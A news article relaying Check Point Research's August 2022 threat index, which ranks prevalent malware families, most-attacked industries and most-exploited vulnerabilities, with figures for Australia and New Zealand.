Emotet lost first place

FormBook is now the most prevalent malware, taking over from Emotet, which has held that position since its reemergence in January, according to Check Point Research’s latest Global Threat Index for August 2022.

FormBook is an Infostealer targeting the Windows operating system which, when deployed, can collect credentials, collect screenshots, monitor and log keystrokes, as well as download and execute files based on its command and control (C&C) orders. Since it was first spotted in 2016, it has steadily made a name for itself, marketed as Malware as a Service (MaaS) in underground hacking forums, known for its evasion techniques powerful and its relatively low price.

August also saw a rapid increase in GuLoader activity, making it the fourth most prevalent malware. GuLoader was originally used to download Parallax RAT, but has since been applied to other remote access Trojans and information stealers such as Netwire, FormBook, and Agent Tesla. It is usually distributed through extensive phishing email campaigns, which trick the victim into downloading and opening a malicious file, allowing the malware to get to work.

Additionally, Check Point Research reports that Joker, an Android spyware, is back in business and claimed the third spot in the mobile malware list this month. Once Joker is installed, he can steal text messages, contact lists, and device information, as well as subscribe to paid premium services without his consent. Its rise can partly be explained by an increase in campaigns, as it was recently spotted active in some apps in the Google Play Store.

“The changes we’re seeing in this month’s index, from Emotet rising from first to fifth place to Joker becoming the third most prevalent mobile malware, reflects how quickly the threat landscape can change” , says Maya Horowitz, vice president of research at Check Point. Software.

“This should remind individuals and businesses alike of the importance of keeping up to date with the latest threats because knowing how to protect yourself is essential. Threat actors are constantly evolving and the emergence of FormBook shows that one can never be complacent about security and must take a holistic, prevention-focused approach across networks, endpoints and the cloud. »

The CPR also revealed this month that the education and research sector remains the industry most targeted by cybercriminals globally. Government/military and healthcare taking second and third place as the most attacked sectors. Apache Log4j Remote Code Execution returns to the top spot as the most exploited vulnerability, affecting 44% of organizations worldwide, after overtaking Web Server Exposed Git Repository Information Disclosure which had an impact of 42%.

Top Malware Families in Australia

FormBook is the most widespread malware this month, affecting 5.10% of organizations globally and 4.03% of organizations in Australia, followed by Emotet with an impact of 2.10% of organizations worldwide , 2.02% in Australia and XMRig with an impact of 2.10% worldwide and 0.90%. in Australia.

FormBook is an Infostealer targeting Windows operating system and was first detected in 2016. It is marketed as Malware as a Service (MaaS) in underground hacking forums for its powerful evasion techniques and its relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files based on commands from its C&C.

Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but recently it is used as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. Also, it can spread through phishing spam emails that contains malicious attachments or links.

XMRig is an open-source CPU software used to mine the Monero cryptocurrency. Threat actors often misuse this open source software by bundling it with their malware to conduct illegal mining on victims’ devices.

Top Malware Families in New Zealand

Emotet surged in New Zealand, taking the place of the most prevalent malware in July, affecting 2.61% of New Zealand organizations as well as 2.10% of organizations globally. This is followed by XMRig with an impact of 2.10% globally and 1.12% in New Zealand and Remcos with an impact of 1.12% in New Zealand and an impact of 1.00% for global organizations.

Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but recently it is used as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. Also, it can spread through phishing spam emails that contains malicious attachments or links.

XMRig is an open-source CPU software used to mine the Monero cryptocurrency. Threat actors often misuse this open source software by bundling it with their malware to conduct illegal mining on victims’ devices.

Remcos is a RAT that first appeared in the wild in 2016. Remcos is distributed via malicious Microsoft Office documents, which are attached to SPAM emails, and is designed to bypass Microsoft Windows UAC security and run malware with high level privileges.

Main industries attacked in Australia

This month, the education/research sector remained in first place as the most attacked industry in Australia, followed by government/military and insurance/legal.

Main exploited vulnerabilities

This month, Apache Log4j Remote Code Execution is the most commonly exploited vulnerability, affecting 44% of organizations worldwide, followed by Web Server Exposed Git Repository Information Disclosure which jumped from first to second place with an impact of 42%. Malicious URL Directory Traversal Web Servers remains in third place, with an overall impact of 39%.

Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.

Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported in the Git repository. Successful exploitation of this vulnerability could allow inadvertent disclosure of account information.

Malicious URL Directory Traversal on Web Servers – A directory traversal vulnerability exists on various web servers. The vulnerability is caused due to an input validation error in a web server that does not properly sanitize the URI for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.

Top Mobile Malware

This month, AlienBot is the most prevalent mobile malware, followed by Anubis and Joker.

AlienBot is a banking Trojan for Android, sold as Malware-as-a-Service (MaaS). It supports keylogging, dynamic overlays for credential theft, as well as SMS collection for 2FA bypass. Additional remote control functionality is provided using a TeamViewer module.

Anubis is a banking Trojan malware designed for Android mobile phones. Since its initial detection, it has acquired additional features including Remote Access Trojan (RAT) functionality, keylogging and audio recording capabilities as well as various ransomware features. It has been detected on hundreds of different apps available in the Google Store.

Joker is Android spyware in Google Play designed to steal SMS messages, contact lists and device information. Moreover, the malware can also subscribe the victim to paid premium services without their knowledge or consent.

Comments are closed.